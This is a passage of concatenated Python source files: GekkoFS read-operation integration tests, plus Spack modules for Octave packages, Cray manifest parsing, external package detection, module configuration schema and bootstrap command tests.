'statx' : StatxOutputSchema(),
'lseek' : LseekOutputSchema(),
}
def parse(self, command, output):
if command in self.OutputSchemas:
return self.OutputSchemas[command].loads(output)
else:
raise ValueError(f"Unknown I/O command {command}")
```
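`IOParser` looks up the schema for a command and returns the deserialized namedtuple. A sketch with hand-written JSON (the field values are invented):
```python
parser = IOParser()  # the class defined above

# Hypothetical output of a mkdir call, as the harness would capture it.
result = parser.parse('mkdir', '{"retval": 0, "errnum": 0}')
print(result.retval, result.errno)  # 0 0
```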
#### File: integration/operations/test_read_operations.py
```python
import harness
from pathlib import Path
import errno
import stat
import os
import ctypes
import sh
import sys
import pytest
from harness.logger import logger
nonexisting = "nonexisting"
def test_read(gkfs_daemon, gkfs_client):
file = gkfs_daemon.mountdir / "file"
# create a file in gekkofs
ret = gkfs_client.open(file,
os.O_CREAT | os.O_WRONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# write a buffer we know
buf = b'42'
ret = gkfs_client.write(file, buf, len(buf))
assert ret.retval == len(buf) # Return the number of written bytes
assert ret.errno == 115 #FIXME: Should be 0!
# open the file to read
ret = gkfs_client.open(file,
os.O_RDONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# read the file
ret = gkfs_client.read(file, len(buf))
assert ret.buf == buf
assert ret.retval == len(buf) # Return the number of read bytes
assert ret.errno == 115 #FIXME: Should be 0!
def test_pread(gkfs_daemon, gkfs_client):
file = gkfs_daemon.mountdir / "file"
# create a file in gekkofs
ret = gkfs_client.open(file,
os.O_CREAT | os.O_WRONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# write a buffer we know
buf = b'42'
ret = gkfs_client.pwrite(file, buf, len(buf), 1024)
assert ret.retval == len(buf) # Return the number of written bytes
assert ret.errno == 115 #FIXME: Should be 0!
# open the file to read
ret = gkfs_client.open(file,
os.O_RDONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# read the file at offset 1024
ret = gkfs_client.pread(file, len(buf), 1024)
assert ret.buf == buf
assert ret.retval == len(buf) # Return the number of read bytes
assert ret.errno == 115 #FIXME: Should be 0!
def test_readv(gkfs_daemon, gkfs_client):
file = gkfs_daemon.mountdir / "file"
# create a file in gekkofs
ret = gkfs_client.open(file,
os.O_CREAT | os.O_WRONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# write a buffer we know
buf_0 = b'42'
buf_1 = b'24'
ret = gkfs_client.writev(file, buf_0, buf_1, 2)
assert ret.retval == len(buf_0) + len(buf_1) # Return the number of written bytes
assert ret.errno == 115 #FIXME: Should be 0!
# open the file to read
ret = gkfs_client.open(file,
os.O_RDONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# read the file
ret = gkfs_client.readv(file, len(buf_0), len(buf_1))
assert ret.buf_0 == buf_0
assert ret.buf_1 == buf_1
assert ret.retval == len(buf_0) + len(buf_1) # Return the number of read bytes
assert ret.errno == 115 #FIXME: Should be 0!
def test_preadv(gkfs_daemon, gkfs_client):
file = gkfs_daemon.mountdir / "file"
# create a file in gekkofs
ret = gkfs_client.open(file,
os.O_CREAT | os.O_WRONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# write a buffer we know
buf_0 = b'42'
buf_1 = b'24'
ret = gkfs_client.pwritev(file, buf_0, buf_1, 2, 1024)
assert ret.retval == len(buf_0) + len(buf_1) # Return the number of written bytes
assert ret.errno == 115 #FIXME: Should be 0!
# open the file to read
ret = gkfs_client.open(file,
os.O_RDONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# read the file
ret = gkfs_client.preadv(file, len(buf_0), len(buf_1), 1024)
assert ret.buf_0 == buf_0
assert ret.buf_1 == buf_1
assert ret.retval == len(buf_0) + len(buf_1) # Return the number of read bytes
assert ret.errno == 115 #FIXME: Should be 0!
```
|
{
"source": "jeanbez/spack",
"score": 2
}
|
#### File: spack/build_systems/octave.py
```python
import inspect
from spack.directives import extends
from spack.package_base import PackageBase, run_after
class OctavePackage(PackageBase):
"""Specialized class for Octave packages. See
https://www.gnu.org/software/octave/doc/v4.2.0/Installing-and-Removing-Packages.html
for more information.
This class provides the following phases that can be overridden:
1. :py:meth:`~.OctavePackage.install`
"""
# Default phases
phases = ['install']
# To be used in UI queries that require to know which
# build-system class we are using
build_system_class = 'OctavePackage'
extends('octave')
def setup_build_environment(self, env):
# octave does not like those environment variables to be set:
env.unset('CC')
env.unset('CXX')
env.unset('FC')
def install(self, spec, prefix):
"""Install the package from the archive file"""
inspect.getmodule(self).octave(
'--quiet',
'--norc',
'--built-in-docstrings-file=/dev/null',
'--texi-macros-file=/dev/null',
'--eval', 'pkg prefix %s; pkg install %s' %
(prefix, self.stage.archive_file))
# Testing
# Check that self.prefix is there after installation
run_after('install')(PackageBase.sanity_check_prefix)
```
#### File: spack/spack/cray_manifest.py
```python
import json
import jsonschema
import six
import llnl.util.tty as tty
import spack.cmd
import spack.hash_types as hash_types
from spack.schema.cray_manifest import schema as manifest_schema
#: Cray systems can store a Spack-compatible description of system
#: packages here.
default_path = '/opt/cray/pe/cpe-descriptive-manifest/'
compiler_name_translation = {
'nvidia': 'nvhpc',
}
def translated_compiler_name(manifest_compiler_name):
"""
When creating a Compiler object, Spack expects a name matching
one of the classes in `spack.compilers`. Names in the Cray manifest
may differ; for cases where we know the name refers to a compiler in
Spack, this function translates it automatically.
This function will raise an error if there is no recorded translation
and the name doesn't match a known compiler name.
"""
if manifest_compiler_name in compiler_name_translation:
return compiler_name_translation[manifest_compiler_name]
elif manifest_compiler_name in spack.compilers.supported_compilers():
return manifest_compiler_name
else:
        # Try to fail quickly. Two cases can bring us here: (1) the manifest
        # defines a compiler Spack doesn't know about, or (2) a spec names a
        # compiler that doesn't exist. The first is caught here while creating
        # the compiler definition; the second would produce specs with
        # undefined compilers.
raise spack.compilers.UnknownCompilerError(
"Manifest parsing - unknown compiler: {0}"
.format(manifest_compiler_name))
def compiler_from_entry(entry):
compiler_name = translated_compiler_name(entry['name'])
paths = entry['executables']
version = entry['version']
arch = entry['arch']
operating_system = arch['os']
target = arch['target']
compiler_cls = spack.compilers.class_for_compiler_name(compiler_name)
spec = spack.spec.CompilerSpec(compiler_cls.name, version)
paths = [paths.get(x, None) for x in ('cc', 'cxx', 'f77', 'fc')]
return compiler_cls(
spec, operating_system, target, paths
)
def spec_from_entry(entry):
arch_str = ""
if 'arch' in entry:
arch_format = "arch={platform}-{os}-{target}"
arch_str = arch_format.format(
platform=entry['arch']['platform'],
os=entry['arch']['platform_os'],
target=entry['arch']['target']['name']
)
compiler_str = ""
if 'compiler' in entry:
compiler_format = "%{name}@{version}"
compiler_str = compiler_format.format(
name=translated_compiler_name(entry['compiler']['name']),
version=entry['compiler']['version']
)
spec_format = "{name}@{version} {compiler} {arch}"
spec_str = spec_format.format(
name=entry['name'],
version=entry['version'],
compiler=compiler_str,
arch=arch_str
)
package = spack.repo.get(entry['name'])
if 'parameters' in entry:
variant_strs = list()
for name, value in entry['parameters'].items():
# TODO: also ensure that the variant value is valid?
if not (name in package.variants):
tty.debug("Omitting variant {0} for entry {1}/{2}"
.format(name, entry['name'], entry['hash'][:7]))
continue
# Value could be a list (of strings), boolean, or string
if isinstance(value, six.string_types):
variant_strs.append('{0}={1}'.format(name, value))
else:
try:
iter(value)
variant_strs.append(
'{0}={1}'.format(name, ','.join(value)))
continue
except TypeError:
# Not an iterable
pass
# At this point not a string or collection, check for boolean
if value in [True, False]:
bool_symbol = '+' if value else '~'
variant_strs.append('{0}{1}'.format(bool_symbol, name))
else:
raise ValueError(
"Unexpected value for {0} ({1}): {2}".format(
name, str(type(value)), str(value)
)
)
spec_str += ' ' + ' '.join(variant_strs)
spec, = spack.cmd.parse_specs(spec_str.split())
for ht in [hash_types.dag_hash, hash_types.build_hash,
hash_types.full_hash]:
setattr(spec, ht.attr, entry['hash'])
spec._concrete = True
spec._hashes_final = True
spec.external_path = entry['prefix']
spec.origin = 'external-db'
spack.spec.Spec.ensure_valid_variants(spec)
return spec
def entries_to_specs(entries):
spec_dict = {}
for entry in entries:
try:
spec = spec_from_entry(entry)
spec_dict[spec._hash] = spec
except spack.repo.UnknownPackageError:
tty.debug("Omitting package {0}: no corresponding repo package"
.format(entry['name']))
except spack.error.SpackError:
raise
except Exception:
tty.warn("Could not parse entry: " + str(entry))
for entry in filter(lambda x: 'dependencies' in x, entries):
dependencies = entry['dependencies']
for name, properties in dependencies.items():
dep_hash = properties['hash']
deptypes = properties['type']
if dep_hash in spec_dict:
if entry['hash'] not in spec_dict:
continue
parent_spec = spec_dict[entry['hash']]
dep_spec = spec_dict[dep_hash]
parent_spec._add_dependency(dep_spec, deptypes)
return spec_dict
def read(path, apply_updates):
with open(path, 'r') as json_file:
json_data = json.load(json_file)
jsonschema.validate(json_data, manifest_schema)
specs = entries_to_specs(json_data['specs'])
tty.debug("{0}: {1} specs read from manifest".format(
path,
str(len(specs))))
compilers = list()
if 'compilers' in json_data:
compilers.extend(compiler_from_entry(x)
for x in json_data['compilers'])
tty.debug("{0}: {1} compilers read from manifest".format(
path,
str(len(compilers))))
if apply_updates and compilers:
spack.compilers.add_compilers_to_config(
compilers, init_config=False)
if apply_updates:
for spec in specs.values():
spack.store.db.add(spec, directory_layout=None)
```
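For reference, a minimal manifest entry containing only the fields `spec_from_entry` reads above; every value here is invented:
```python
entry = {
    'name': 'zlib',
    'version': '1.2.11',
    'arch': {
        'platform': 'cray',
        'platform_os': 'sles15',
        'target': {'name': 'x86_64'},
    },
    'compiler': {'name': 'gcc', 'version': '8.2.0'},
    'hash': 'abcdef1234567890',
    'prefix': '/opt/cray/zlib/1.2.11',
}
# spec_from_entry(entry) would assemble and parse the spec string:
#   zlib@1.2.11 %gcc@8.2.0 arch=cray-sles15-x86_64
```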
#### File: spack/detection/common.py
```python
import collections
import itertools
import os
import os.path
import re
import sys
import six
import llnl.util.tty
import spack.config
import spack.spec
import spack.util.spack_yaml
is_windows = sys.platform == 'win32'
#: Information on a package that has been detected
DetectedPackage = collections.namedtuple(
'DetectedPackage', ['spec', 'prefix']
)
def _externals_in_packages_yaml():
"""Return all the specs mentioned as externals in packages.yaml"""
packages_yaml = spack.config.get('packages')
already_defined_specs = set()
for pkg_name, package_configuration in packages_yaml.items():
for item in package_configuration.get('externals', []):
already_defined_specs.add(spack.spec.Spec(item['spec']))
return already_defined_specs
def _pkg_config_dict(external_pkg_entries):
"""Generate a package specific config dict according to the packages.yaml schema.
This does not generate the entire packages.yaml. For example, given some
external entries for the CMake package, this could return::
{
'externals': [{
'spec': '[email protected]',
'prefix': '/opt/cmake-3.17.1/'
}, {
'spec': '[email protected]',
'prefix': '/opt/cmake-3.16.5/'
}]
}
"""
pkg_dict = spack.util.spack_yaml.syaml_dict()
pkg_dict['externals'] = []
for e in external_pkg_entries:
if not _spec_is_valid(e.spec):
continue
external_items = [('spec', str(e.spec)), ('prefix', e.prefix)]
if e.spec.external_modules:
external_items.append(('modules', e.spec.external_modules))
if e.spec.extra_attributes:
external_items.append(
('extra_attributes',
spack.util.spack_yaml.syaml_dict(e.spec.extra_attributes.items()))
)
# external_items.extend(e.spec.extra_attributes.items())
pkg_dict['externals'].append(
spack.util.spack_yaml.syaml_dict(external_items)
)
return pkg_dict
def _spec_is_valid(spec):
try:
str(spec)
except spack.error.SpackError:
# It is assumed here that we can at least extract the package name from
# the spec so we can look up the implementation of
# determine_spec_details
msg = 'Constructed spec for {0} does not have a string representation'
llnl.util.tty.warn(msg.format(spec.name))
return False
try:
spack.spec.Spec(str(spec))
except spack.error.SpackError:
llnl.util.tty.warn(
'Constructed spec has a string representation but the string'
' representation does not evaluate to a valid spec: {0}'
.format(str(spec))
)
return False
return True
def is_executable(file_path):
"""Return True if the path passed as argument is that of an executable"""
return os.path.isfile(file_path) and os.access(file_path, os.X_OK)
def _convert_to_iterable(single_val_or_multiple):
x = single_val_or_multiple
if x is None:
return []
elif isinstance(x, six.string_types):
return [x]
elif isinstance(x, spack.spec.Spec):
# Specs are iterable, but a single spec should be converted to a list
return [x]
try:
iter(x)
return x
except TypeError:
return [x]
def executable_prefix(executable_dir):
"""Given a directory where an executable is found, guess the prefix
(i.e. the "root" directory of that installation) and return it.
Args:
executable_dir: directory where an executable is found
"""
# Given a prefix where an executable is found, assuming that prefix
# contains /bin/, strip off the 'bin' directory to get a Spack-compatible
# prefix
assert os.path.isdir(executable_dir)
components = executable_dir.split(os.sep)
if 'bin' not in components:
return executable_dir
idx = components.index('bin')
return os.sep.join(components[:idx])
def library_prefix(library_dir):
"""Given a directory where an library is found, guess the prefix
(i.e. the "root" directory of that installation) and return it.
Args:
library_dir: directory where an library is found
"""
    # Given a prefix where a library is found, assuming that prefix
# contains /lib/ or /lib64/, strip off the 'lib' or 'lib64' directory
# to get a Spack-compatible prefix
assert os.path.isdir(library_dir)
components = library_dir.split(os.sep)
if 'lib64' in components:
idx = components.index('lib64')
return os.sep.join(components[:idx])
elif 'lib' in components:
idx = components.index('lib')
return os.sep.join(components[:idx])
else:
return library_dir
def update_configuration(detected_packages, scope=None, buildable=True):
"""Add the packages passed as arguments to packages.yaml
Args:
detected_packages (list): list of DetectedPackage objects to be added
scope (str): configuration scope where to add the detected packages
buildable (bool): whether the detected packages are buildable or not
"""
predefined_external_specs = _externals_in_packages_yaml()
pkg_to_cfg, all_new_specs = {}, []
for package_name, entries in detected_packages.items():
new_entries = [
e for e in entries if (e.spec not in predefined_external_specs)
]
pkg_config = _pkg_config_dict(new_entries)
all_new_specs.extend([
spack.spec.Spec(x['spec']) for x in pkg_config.get('externals', [])
])
if buildable is False:
pkg_config['buildable'] = False
pkg_to_cfg[package_name] = pkg_config
pkgs_cfg = spack.config.get('packages', scope=scope)
pkgs_cfg = spack.config.merge_yaml(pkgs_cfg, pkg_to_cfg)
spack.config.set('packages', pkgs_cfg, scope=scope)
return all_new_specs
def find_win32_additional_install_paths():
"""Not all programs on Windows live on the PATH
Return a list of other potential install locations.
"""
windows_search_ext = []
    cuda_re = r'CUDA_PATH[a-zA-Z0-9_]*'
# The list below should be expanded with other
    # common Windows install locations as necessary
path_ext_keys = ['I_MPI_ONEAPI_ROOT',
'MSMPI_BIN',
'MLAB_ROOT',
'NUGET_PACKAGES']
user = os.environ["USERPROFILE"]
add_path = lambda key: re.search(cuda_re, key) or key in path_ext_keys
windows_search_ext.extend([os.environ[key] for key
in os.environ.keys() if
add_path(key)])
# note windows paths are fine here as this method should only ever be invoked
# to interact with Windows
# Add search path for default Chocolatey (https://github.com/chocolatey/choco)
# install directory
windows_search_ext.append("C:\\ProgramData\\chocolatey\\bin")
# Add search path for NuGet package manager default install location
windows_search_ext.append(os.path.join(user, ".nuget", "packages"))
windows_search_ext.extend(
spack.config.get("config:additional_external_search_paths", default=[])
)
windows_search_ext.extend(spack.util.environment.get_path('PATH'))
return windows_search_ext
def compute_windows_program_path_for_package(pkg):
"""Given a package, attempt to compute its Windows
program files location, return list of best guesses
Args:
pkg (spack.package_base.Package): package for which
Program Files location is to be computed
"""
if not is_windows:
return []
# note windows paths are fine here as this method should only ever be invoked
# to interact with Windows
program_files = 'C:\\Program Files{}\\{}'
return[program_files.format(arch, name) for
arch, name in itertools.product(("", " (x86)"),
(pkg.name, pkg.name.capitalize()))]
```
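`executable_prefix` and `library_prefix` simply cut the path at the `bin`/`lib` component. The same string logic, minus the `isdir` assertion, on an invented path:
```python
import os

executable_dir = os.sep.join(['', 'opt', 'cmake-3.17.1', 'bin'])
components = executable_dir.split(os.sep)
idx = components.index('bin')
print(os.sep.join(components[:idx]))  # /opt/cmake-3.17.1 on POSIX
```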
#### File: spack/schema/modules.py
```python
import warnings
import spack.schema.environment
import spack.schema.projections
#: Matches a spec or a multi-valued variant but not another
#: valid keyword.
#:
#: THIS NEEDS TO BE UPDATED FOR EVERY NEW KEYWORD THAT
#: IS ADDED IMMEDIATELY BELOW THE MODULE TYPE ATTRIBUTE
spec_regex = r'(?!hierarchy|core_specs|verbose|hash_length|whitelist|' \
r'blacklist|projections|naming_scheme|core_compilers|all|' \
r'defaults)(^\w[\w-]*)'
#: Matches a valid name for a module set
valid_module_set_name = r'^(?!arch_folder$|lmod$|roots$|enable$|prefix_inspections$|'\
r'tcl$|use_view$)\w[\w-]*$'
#: Matches an anonymous spec, i.e. a spec without a root name
anonymous_spec_regex = r'^[\^@%+~]'
#: Definitions for parts of module schema
array_of_strings = {
'type': 'array', 'default': [], 'items': {'type': 'string'}
}
dictionary_of_strings = {
'type': 'object', 'patternProperties': {r'\w[\w-]*': {'type': 'string'}}
}
dependency_selection = {'type': 'string', 'enum': ['none', 'direct', 'all']}
module_file_configuration = {
'type': 'object',
'default': {},
'additionalProperties': False,
'properties': {
'filter': {
'type': 'object',
'default': {},
'additionalProperties': False,
'properties': {
'environment_blacklist': {
'type': 'array',
'default': [],
'items': {
'type': 'string'
}
}
}
},
'template': {
'type': 'string'
},
'autoload': dependency_selection,
'prerequisites': dependency_selection,
'conflict': array_of_strings,
'load': array_of_strings,
'suffixes': {
'type': 'object',
'validate_spec': True,
'patternProperties': {
r'\w[\w-]*': { # key
'type': 'string'
}
}
},
'environment': spack.schema.environment.definition
}
}
projections_scheme = spack.schema.projections.properties['projections']
module_type_configuration = {
'type': 'object',
'default': {},
'allOf': [
{'properties': {
'verbose': {
'type': 'boolean',
'default': False
},
'hash_length': {
'type': 'integer',
'minimum': 0,
'default': 7
},
'whitelist': array_of_strings,
'blacklist': array_of_strings,
'blacklist_implicits': {
'type': 'boolean',
'default': False
},
'defaults': array_of_strings,
'naming_scheme': {
'type': 'string' # Can we be more specific here?
},
'projections': projections_scheme,
'all': module_file_configuration,
}
},
{'validate_spec': True,
'patternProperties': {
spec_regex: module_file_configuration,
anonymous_spec_regex: module_file_configuration,
}
}
]
}
module_config_properties = {
'use_view': {'anyOf': [
{'type': 'string'},
{'type': 'boolean'}
]},
'arch_folder': {'type': 'boolean'},
'roots': {
'type': 'object',
'properties': {
'tcl': {'type': 'string'},
'lmod': {'type': 'string'},
},
},
'enable': {
'type': 'array',
'default': [],
'items': {
'type': 'string',
'enum': ['tcl', 'lmod']
}
},
'lmod': {
'allOf': [
# Base configuration
module_type_configuration,
{
'type': 'object',
'properties': {
'core_compilers': array_of_strings,
'hierarchy': array_of_strings,
'core_specs': array_of_strings,
},
} # Specific lmod extensions
]
},
'tcl': {
'allOf': [
# Base configuration
module_type_configuration,
{} # Specific tcl extensions
]
},
'prefix_inspections': {
'type': 'object',
'additionalProperties': False,
'patternProperties': {
# prefix-relative path to be inspected for existence
r'^[\w-]*': array_of_strings
}
},
}
def deprecation_msg_default_module_set(instance, props):
return (
'Top-level properties "{0}" in module config are ignored as of Spack v0.18. '
'They should be set on the "default" module set. Run\n\n'
'\t$ spack config update modules\n\n'
'to update the file to the new format'.format('", "'.join(instance))
)
# Properties for inclusion into other schemas (requires definitions)
properties = {
'modules': {
'type': 'object',
'additionalProperties': False,
'properties': {
'prefix_inspections': {
'type': 'object',
'additionalProperties': False,
'patternProperties': {
# prefix-relative path to be inspected for existence
r'^[\w-]*': array_of_strings
}
},
},
'patternProperties': {
valid_module_set_name: {
'type': 'object',
'default': {},
'additionalProperties': False,
'properties': module_config_properties
},
# Deprecated top-level keys (ignored in 0.18 with a warning)
'^(arch_folder|lmod|roots|enable|tcl|use_view)$': {}
},
'deprecatedProperties': {
'properties': ['arch_folder', 'lmod', 'roots', 'enable', 'tcl', 'use_view'],
'message': deprecation_msg_default_module_set,
'error': False
}
}
}
#: Full schema with metadata
schema = {
'$schema': 'http://json-schema.org/draft-07/schema#',
'title': 'Spack module file configuration file schema',
'type': 'object',
'additionalProperties': False,
'properties': properties,
}
def update(data):
"""Update the data in place to remove deprecated properties.
Args:
data (dict): dictionary to be updated
Returns:
True if data was changed, False otherwise
"""
changed = False
deprecated_top_level_keys = ('arch_folder', 'lmod', 'roots', 'enable',
'tcl', 'use_view')
# Don't update when we already have a default module set
if 'default' in data:
if any(key in data for key in deprecated_top_level_keys):
warnings.warn('Did not move top-level module properties into "default" '
'module set, because the "default" module set is already '
'defined')
return changed
default = {}
# Move deprecated top-level keys under "default" module set.
for key in deprecated_top_level_keys:
if key in data:
default[key] = data.pop(key)
if default:
changed = True
data['default'] = default
return changed
```
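The two regexes at the top of this schema are easy to sanity-check outside of jsonschema. A quick sketch (the names and spec strings below are made up) showing which module-set names pass `valid_module_set_name` and which spec strings count as anonymous:
```python
# Exercise the schema's name patterns directly with re. The regexes are
# copied from spack/schema/modules.py above; inputs are illustrative.
import re

valid_module_set_name = (r'^(?!arch_folder$|lmod$|roots$|enable$|'
                         r'prefix_inspections$|tcl$|use_view$)\w[\w-]*$')
anonymous_spec_regex = r'^[\^@%+~]'

for name in ('default', 'my-modules', 'tcl', 'use_view'):
    ok = re.match(valid_module_set_name, name) is not None
    print('%-12s valid module set name: %s' % (name, ok))
for spec in ('gcc', '+mpi', '@4.5:'):
    anon = re.match(anonymous_spec_regex, spec) is not None
    print('%-12s anonymous spec: %s' % (spec, anon))
```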
#### File: test/cmd/bootstrap.py
```python
import os.path
import sys
import pytest
import spack.bootstrap
import spack.config
import spack.environment as ev
import spack.main
import spack.mirror
from spack.util.path import convert_to_posix_path
_bootstrap = spack.main.SpackCommand('bootstrap')
@pytest.mark.parametrize('scope', [
None, 'site', 'system', 'user'
])
def test_enable_and_disable(mutable_config, scope):
scope_args = []
if scope:
scope_args = ['--scope={0}'.format(scope)]
_bootstrap('enable', *scope_args)
assert spack.config.get('bootstrap:enable', scope=scope) is True
_bootstrap('disable', *scope_args)
assert spack.config.get('bootstrap:enable', scope=scope) is False
@pytest.mark.parametrize('scope', [
None, 'site', 'system', 'user'
])
def test_root_get_and_set(mutable_config, scope):
scope_args, path = [], '/scratch/spack/bootstrap'
if scope:
scope_args = ['--scope={0}'.format(scope)]
_bootstrap('root', path, *scope_args)
out = _bootstrap('root', *scope_args, output=str)
if sys.platform == 'win32':
out = convert_to_posix_path(out)
assert out.strip() == path
@pytest.mark.parametrize('scopes', [
('site',),
('system', 'user')
])
def test_reset_in_file_scopes(mutable_config, scopes):
# Assert files are created in the right scopes
bootstrap_yaml_files = []
for s in scopes:
_bootstrap('disable', '--scope={0}'.format(s))
scope_path = spack.config.config.scopes[s].path
bootstrap_yaml = os.path.join(
scope_path, 'bootstrap.yaml'
)
assert os.path.exists(bootstrap_yaml)
bootstrap_yaml_files.append(bootstrap_yaml)
_bootstrap('reset', '-y')
for bootstrap_yaml in bootstrap_yaml_files:
assert not os.path.exists(bootstrap_yaml)
def test_reset_in_environment(mutable_mock_env_path, mutable_config):
env = spack.main.SpackCommand('env')
env('create', 'bootstrap-test')
current_environment = ev.read('bootstrap-test')
with current_environment:
_bootstrap('disable')
assert spack.config.get('bootstrap:enable') is False
_bootstrap('reset', '-y')
# We have no default settings in tests
assert spack.config.get('bootstrap:enable') is None
# Check that reset didn't delete the entire file
spack_yaml = os.path.join(current_environment.path, 'spack.yaml')
assert os.path.exists(spack_yaml)
def test_reset_in_file_scopes_overwrites_backup_files(mutable_config):
# Create a bootstrap.yaml with some config
_bootstrap('disable', '--scope=site')
scope_path = spack.config.config.scopes['site'].path
bootstrap_yaml = os.path.join(scope_path, 'bootstrap.yaml')
assert os.path.exists(bootstrap_yaml)
# Reset the bootstrap configuration
_bootstrap('reset', '-y')
backup_file = bootstrap_yaml + '.bkp'
assert not os.path.exists(bootstrap_yaml)
assert os.path.exists(backup_file)
# Iterate another time
_bootstrap('disable', '--scope=site')
assert os.path.exists(bootstrap_yaml)
assert os.path.exists(backup_file)
_bootstrap('reset', '-y')
assert not os.path.exists(bootstrap_yaml)
assert os.path.exists(backup_file)
def test_list_sources(capsys):
# Get the merged list and ensure we get our defaults
with capsys.disabled():
output = _bootstrap('list')
assert "github-actions" in output
# Ask for a specific scope and check that the list of sources is empty
with capsys.disabled():
output = _bootstrap('list', '--scope', 'user')
assert "No method available" in output
@pytest.mark.parametrize('command,value', [
('trust', True),
('untrust', False)
])
def test_trust_or_untrust_sources(mutable_config, command, value):
key = 'bootstrap:trusted:github-actions'
trusted = spack.config.get(key, default=None)
assert trusted is None
_bootstrap(command, 'github-actions')
trusted = spack.config.get(key, default=None)
assert trusted is value
def test_trust_or_untrust_fails_with_no_method(mutable_config):
with pytest.raises(RuntimeError, match='no bootstrapping method'):
_bootstrap('trust', 'foo')
def test_trust_or_untrust_fails_with_more_than_one_method(mutable_config):
wrong_config = {'sources': [
{'name': 'github-actions',
'metadata': '$spack/share/spack/bootstrap/github-actions'},
{'name': 'github-actions',
'metadata': '$spack/share/spack/bootstrap/github-actions'}],
'trusted': {}
}
with spack.config.override('bootstrap', wrong_config):
with pytest.raises(RuntimeError, match='more than one'):
_bootstrap('trust', 'github-actions')
@pytest.mark.parametrize('use_existing_dir', [True, False])
def test_add_failures_for_non_existing_files(mutable_config, tmpdir, use_existing_dir):
metadata_dir = str(tmpdir) if use_existing_dir else '/foo/doesnotexist'
with pytest.raises(RuntimeError, match='does not exist'):
_bootstrap('add', 'mock-mirror', metadata_dir)
def test_add_failures_for_already_existing_name(mutable_config):
with pytest.raises(RuntimeError, match='already exist'):
_bootstrap('add', 'github-actions', 'some-place')
def test_remove_failure_for_non_existing_names(mutable_config):
with pytest.raises(RuntimeError, match='cannot find'):
_bootstrap('remove', 'mock-mirror')
def test_remove_and_add_a_source(mutable_config):
# Check we start with a single bootstrapping source
sources = spack.bootstrap.bootstrapping_sources()
assert len(sources) == 1
# Remove it and check the result
_bootstrap('remove', 'github-actions')
sources = spack.bootstrap.bootstrapping_sources()
assert not sources
# Add it back and check we restored the initial state
_bootstrap(
'add', 'github-actions', '$spack/share/spack/bootstrap/github-actions-v0.2'
)
sources = spack.bootstrap.bootstrapping_sources()
assert len(sources) == 1
@pytest.mark.maybeslow
@pytest.mark.skipif(sys.platform == 'win32', reason="Not supported on Windows (yet)")
def test_bootstrap_mirror_metadata(mutable_config, linux_os, monkeypatch, tmpdir):
"""Test that `spack bootstrap mirror` creates a folder that can be ingested by
`spack bootstrap add`. Here we don't download data, since that would be an
expensive operation for a unit test.
"""
old_create = spack.mirror.create
monkeypatch.setattr(spack.mirror, 'create', lambda p, s: old_create(p, []))
# Create the mirror in a temporary folder
compilers = [{
'compiler': {
'spec': '[email protected]',
'operating_system': '{0.name}{0.version}'.format(linux_os),
'modules': [],
'paths': {
'cc': '/usr/bin',
'cxx': '/usr/bin',
'fc': '/usr/bin',
'f77': '/usr/bin'
}
}
}]
with spack.config.override('compilers', compilers):
_bootstrap('mirror', str(tmpdir))
# Register the mirror
metadata_dir = tmpdir.join('metadata', 'sources')
_bootstrap('add', '--trust', 'test-mirror', str(metadata_dir))
assert _bootstrap.returncode == 0
assert any(m['name'] == 'test-mirror'
for m in spack.bootstrap.bootstrapping_sources())
```
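The tests above drive the real `spack bootstrap` command against a mutable configuration fixture. For readers unfamiliar with the pattern, here is a minimal self-contained pytest sketch of the same enable/disable round trip; the `Config` class is hypothetical and stands in for Spack's configuration, it is not Spack's API.
```python
# Minimal pytest sketch of the enable/disable round-trip pattern from
# test_enable_and_disable above, against a fake in-memory config store.
import pytest

class Config:
    """Hypothetical stand-in for a scoped configuration store."""
    def __init__(self):
        self._data = {}
    def set(self, key, value, scope=None):
        self._data[(key, scope)] = value
    def get(self, key, scope=None):
        return self._data.get((key, scope))

@pytest.fixture
def mutable_config():
    return Config()

@pytest.mark.parametrize('scope', [None, 'site', 'system', 'user'])
def test_enable_and_disable(mutable_config, scope):
    mutable_config.set('bootstrap:enable', True, scope=scope)
    assert mutable_config.get('bootstrap:enable', scope=scope) is True
    mutable_config.set('bootstrap:enable', False, scope=scope)
    assert mutable_config.get('bootstrap:enable', scope=scope) is False
```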
#### File: spack/test/environment_modifications.py
```python
import os
import sys
import pytest
import spack.util.environment as environment
from spack.paths import spack_root
from spack.util.environment import (
AppendPath,
EnvironmentModifications,
PrependPath,
RemovePath,
SetEnv,
UnsetEnv,
filter_system_paths,
is_system_path,
)
datadir = os.path.join(spack_root, 'lib', 'spack', 'spack', 'test', 'data')
def test_inspect_path(tmpdir):
inspections = {
'bin': ['PATH'],
'man': ['MANPATH'],
'share/man': ['MANPATH'],
'share/aclocal': ['ACLOCAL_PATH'],
'lib': ['LIBRARY_PATH', 'LD_LIBRARY_PATH'],
'lib64': ['LIBRARY_PATH', 'LD_LIBRARY_PATH'],
'include': ['CPATH'],
'lib/pkgconfig': ['PKG_CONFIG_PATH'],
'lib64/pkgconfig': ['PKG_CONFIG_PATH'],
'share/pkgconfig': ['PKG_CONFIG_PATH'],
'': ['CMAKE_PREFIX_PATH']
}
tmpdir.mkdir('bin')
tmpdir.mkdir('lib')
tmpdir.mkdir('include')
env = environment.inspect_path(str(tmpdir), inspections)
names = [item.name for item in env]
assert 'PATH' in names
assert 'LIBRARY_PATH' in names
assert 'LD_LIBRARY_PATH' in names
assert 'CPATH' in names
def test_exclude_paths_from_inspection():
inspections = {
'lib': ['LIBRARY_PATH', 'LD_LIBRARY_PATH'],
